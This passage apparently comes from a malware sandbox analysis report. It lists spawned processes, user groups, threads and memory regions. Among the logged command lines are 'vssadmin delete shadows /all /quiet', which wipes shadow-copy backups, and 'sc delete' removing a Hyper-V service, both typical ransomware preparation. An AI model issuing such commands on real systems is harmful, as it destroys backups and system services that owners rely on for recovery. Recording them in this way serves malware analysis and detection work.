??_V@YAXPEAX@Z () Thread: id = 2 os_tid = 0x168 Process: id = "2" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x24104000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 195 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 196 start_va = 0xe59b000000 end_va = 0xe59b01ffff entry_point = 0x0 region_type = private name = "private_0x000000e59b000000" filename = "" Region: id = 197 start_va = 0xe59b020000 end_va = 0xe59b033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b020000" filename = "" Region: id = 198 start_va = 0xe59b040000 end_va = 0xe59b0bffff entry_point = 0x0 region_type = private name = "private_0x000000e59b040000" filename = "" Region: id = 199 start_va = 0xe59b0c0000 end_va = 0xe59b0c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b0c0000" filename = "" Region: id = 200 start_va = 0xe59b0d0000 end_va = 0xe59b0d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b0d0000" filename = "" Region: id = 201 start_va = 0xe59b0e0000 end_va = 0xe59b0e1fff entry_point = 0x0 region_type = private name = "private_0x000000e59b0e0000" filename = "" Region: id = 202 start_va = 0x7df5ffe50000 end_va = 0x7ff5ffe4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe50000" filename = "" Region: id = 203 start_va = 0x7ff68a9d0000 end_va = 0x7ff68a9f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff68a9d0000" filename = "" Region: id = 204 start_va = 0x7ff68a9fc000 end_va = 0x7ff68a9fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff68a9fc000" filename = "" Region: id = 205 start_va = 0x7ff68a9fe000 end_va = 0x7ff68a9fefff entry_point = 0x0 region_type = private name = "private_0x00007ff68a9fe000" filename = "" Region: id = 206 start_va = 0x7ff68b6b0000 end_va = 0x7ff68b6d7fff entry_point = 0x7ff68b6b0000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 207 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 208 start_va = 0xe59b150000 end_va = 0xe59b24ffff entry_point = 0x0 region_type = private name = "private_0x000000e59b150000" filename = "" Region: id = 209 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 210 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5405 start_va = 0xe59b000000 end_va = 0xe59b00ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b000000" filename = "" Region: id = 5406 start_va = 0xe59b010000 end_va = 0xe59b016fff entry_point = 0x0 region_type = private name = "private_0x000000e59b010000" filename = "" Region: id = 5407 start_va = 0xe59b0f0000 end_va = 0xe59b0f6fff entry_point = 0x0 region_type = private name = "private_0x000000e59b0f0000" filename = "" Region: id = 5408 start_va = 0xe59b100000 end_va = 0xe59b10cfff entry_point = 0xe59b100000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 5409 start_va = 0xe59b110000 end_va = 0xe59b110fff entry_point = 0x0 region_type = private name = "private_0x000000e59b110000" filename = "" Region: id = 5410 start_va = 0xe59b120000 end_va = 0xe59b120fff entry_point = 0x0 region_type = private name = "private_0x000000e59b120000" filename = "" Region: id = 5411 start_va = 0xe59b130000 end_va = 0xe59b13ffff entry_point = 0x0 region_type = private name = "private_0x000000e59b130000" filename = "" Region: id = 5412 start_va = 0xe59b250000 end_va = 0xe59b30dfff entry_point = 0xe59b250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5413 start_va = 0xe59b310000 end_va = 0xe59b38ffff entry_point = 0x0 region_type = private name = "private_0x000000e59b310000" filename = "" Region: id = 5414 start_va = 0xe59b390000 end_va = 0xe59b517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b390000" filename = "" Region: id = 5415 start_va = 0xe59b520000 end_va = 0xe59b6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b520000" filename = "" Region: id = 5416 start_va = 0xe59b6b0000 end_va = 0xe59caaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b6b0000" filename = "" Region: id = 5417 start_va = 0x7ff68a8d0000 end_va = 0x7ff68a9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff68a8d0000" filename = "" Region: id = 5418 start_va = 0x7ff68a9fa000 end_va = 0x7ff68a9fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff68a9fa000" filename = "" Region: id = 5419 start_va = 0x7ffbf9da0000 end_va = 0x7ffbf9db7fff entry_point = 0x7ffbf9da0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 5420 start_va = 0x7ffbf9dc0000 end_va = 0x7ffbf9f42fff entry_point = 0x7ffbf9dc0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 5421 start_va = 0x7ffbfdab0000 end_va = 0x7ffbfdacdfff entry_point = 0x7ffbfdab0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 5422 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5423 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5424 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5425 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5426 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5427 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5428 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5429 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5430 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5431 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5432 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5433 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5434 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5481 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5490 start_va = 0xe59b140000 end_va = 0xe59b140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59b140000" filename = "" Region: id = 5491 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5492 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5528 start_va = 0xe59cab0000 end_va = 0xe59cab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e59cab0000" filename = "" Region: id = 5529 start_va = 0xe59cac0000 end_va = 0xe59cdf6fff entry_point = 0xe59cac0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5530 start_va = 0xe59ce00000 end_va = 0xe59ce7ffff entry_point = 0x0 region_type = private name = "private_0x000000e59ce00000" filename = "" Region: id = 5531 start_va = 0x7ff68a9f8000 end_va = 0x7ff68a9f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff68a9f8000" filename = "" Region: id = 5532 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5533 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5534 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5535 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Thread: id = 3 os_tid = 0xb0 Thread: id = 343 os_tid = 0x1314 Thread: id = 351 os_tid = 0x134c Thread: id = 354 os_tid = 0x1358 Thread: id = 355 os_tid = 0x135c Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1311000" os_pid = "0x7d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb68" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 211 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 212 start_va = 0x80df210000 end_va = 0x80df22ffff entry_point = 0x0 region_type = private name = "private_0x00000080df210000" filename = "" Region: id = 213 start_va = 0x80df230000 end_va = 0x80df243fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000080df230000" filename = "" Region: id = 214 start_va = 0x80df250000 end_va = 0x80df28ffff entry_point = 0x0 region_type = private name = "private_0x00000080df250000" filename = "" Region: id = 215 start_va = 0x7df5ff0d0000 end_va = 0x7ff5ff0cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0d0000" filename = "" Region: id = 216 start_va = 0x7ff6c4120000 end_va = 0x7ff6c4142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4120000" filename = "" Region: id = 217 start_va = 0x7ff6c414d000 end_va = 0x7ff6c414efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c414d000" filename = "" Region: id = 218 start_va = 0x7ff6c414f000 end_va = 0x7ff6c414ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c414f000" filename = "" Region: id = 219 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 220 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1828 start_va = 0x80df350000 end_va = 0x80df44ffff entry_point = 0x0 region_type = private name = "private_0x00000080df350000" filename = "" Region: id = 1829 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1830 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3108 start_va = 0x80df210000 end_va = 0x80df21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000080df210000" filename = "" Region: id = 3109 start_va = 0x80df220000 end_va = 0x80df22ffff entry_point = 0x0 region_type = private name = "private_0x00000080df220000" filename = "" Region: id = 3110 start_va = 0x80df290000 end_va = 0x80df34dfff entry_point = 0x80df290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3111 start_va = 0x80df450000 end_va = 0x80df48ffff entry_point = 0x0 region_type = private name = "private_0x00000080df450000" filename = "" Region: id = 3112 start_va = 0x80df490000 end_va = 0x80df496fff entry_point = 0x0 region_type = private name = "private_0x00000080df490000" filename = "" Region: id = 3113 start_va = 0x80df4a0000 end_va = 0x80df4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000080df4a0000" filename = "" Region: id = 3114 start_va = 0x80df4b0000 end_va = 0x80df4b6fff entry_point = 0x0 region_type = private name = "private_0x00000080df4b0000" filename = "" Region: id = 3115 start_va = 0x80df4c0000 end_va = 0x80df647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000080df4c0000" filename = "" Region: id = 3116 start_va = 0x80df650000 end_va = 0x80df7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000080df650000" filename = "" Region: id = 3117 start_va = 0x80df7e0000 end_va = 0x80e0bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000080df7e0000" filename = "" Region: id = 3118 start_va = 0x80e0be0000 end_va = 0x80e0be0fff entry_point = 0x0 region_type = private name = "private_0x00000080e0be0000" filename = "" Region: id = 3119 start_va = 0x80e0bf0000 end_va = 0x80e0bf0fff entry_point = 0x0 region_type = private name = "private_0x00000080e0bf0000" filename = "" Region: id = 3120 start_va = 0x7ff6c4020000 end_va = 0x7ff6c411ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4020000" filename = "" Region: id = 3121 start_va = 0x7ff6c414b000 end_va = 0x7ff6c414cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c414b000" filename = "" Region: id = 3122 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3123 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3124 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3125 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3126 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3127 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3128 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3129 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3130 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3131 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3132 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3133 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4374 start_va = 0x80e0c00000 end_va = 0x80e0c3ffff entry_point = 0x0 region_type = private name = "private_0x00000080e0c00000" filename = "" Region: id = 4375 start_va = 0x80e0cc0000 end_va = 0x80e0ccffff entry_point = 0x0 region_type = private name = "private_0x00000080e0cc0000" filename = "" Region: id = 4376 start_va = 0x80e0cd0000 end_va = 0x80e0de6fff entry_point = 0x0 region_type = private name = "private_0x00000080e0cd0000" filename = "" Region: id = 4377 start_va = 0x80e0e30000 end_va = 0x80e0e3ffff entry_point = 0x0 region_type = private name = "private_0x00000080e0e30000" filename = "" Region: id = 4378 start_va = 0x80e0e40000 end_va = 0x80e1176fff entry_point = 0x80e0e40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4379 start_va = 0x80e1180000 end_va = 0x80e139bfff entry_point = 0x0 region_type = private name = "private_0x00000080e1180000" filename = "" Region: id = 4380 start_va = 0x80e13a0000 end_va = 0x80e15bffff entry_point = 0x0 region_type = private name = "private_0x00000080e13a0000" filename = "" Region: id = 4381 start_va = 0x80e15c0000 end_va = 0x80e17d2fff entry_point = 0x0 region_type = private name = "private_0x00000080e15c0000" filename = "" Region: id = 4382 start_va = 0x80e17e0000 end_va = 0x80e18f6fff entry_point = 0x0 region_type = private name = "private_0x00000080e17e0000" filename = "" Region: id = 4383 start_va = 0x7ff6c4149000 end_va = 0x7ff6c414afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4149000" filename = "" Region: id = 4384 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4385 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4386 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4387 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4388 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4389 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4390 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4391 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4392 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 4 os_tid = 0xbd8 Thread: id = 156 os_tid = 0xfbc Thread: id = 228 os_tid = 0x1094 Thread: id = 292 os_tid = 0x11c0 Process: id = "4" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe15e000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmickvpexchange\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 221 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 222 start_va = 0x8e19e70000 end_va = 0x8e19e8ffff entry_point = 0x0 region_type = private name = "private_0x0000008e19e70000" filename = "" Region: id = 223 start_va = 0x8e19e90000 end_va = 0x8e19ea3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008e19e90000" filename = "" Region: id = 224 start_va = 0x8e19eb0000 end_va = 0x8e19f2ffff entry_point = 0x0 region_type = private name = "private_0x0000008e19eb0000" filename = "" Region: id = 225 start_va = 0x8e19f30000 end_va = 0x8e19f33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008e19f30000" filename = "" Region: id = 226 start_va = 0x8e19f40000 end_va = 0x8e19f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008e19f40000" filename = "" Region: id = 227 start_va = 0x8e19f50000 end_va = 0x8e19f51fff entry_point = 0x0 region_type = private name = "private_0x0000008e19f50000" filename = "" Region: id = 228 start_va = 0x7df5ff490000 end_va = 0x7ff5ff48ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff490000" filename = "" Region: id = 229 start_va = 0x7ff67a630000 end_va = 0x7ff67a652fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a630000" filename = "" Region: id = 230 start_va = 0x7ff67a658000 end_va = 0x7ff67a658fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a658000" filename = "" Region: id = 231 start_va = 0x7ff67a65e000 end_va = 0x7ff67a65ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a65e000" filename = "" Region: id = 232 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 233 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 432 start_va = 0x8e1a110000 end_va = 0x8e1a20ffff entry_point = 0x0 region_type = private name = "private_0x0000008e1a110000" filename = "" Region: id = 433 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 434 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4878 start_va = 0x8e19e70000 end_va = 0x8e19e7ffff entry_point = 0x0 region_type = pagefile_backed name = 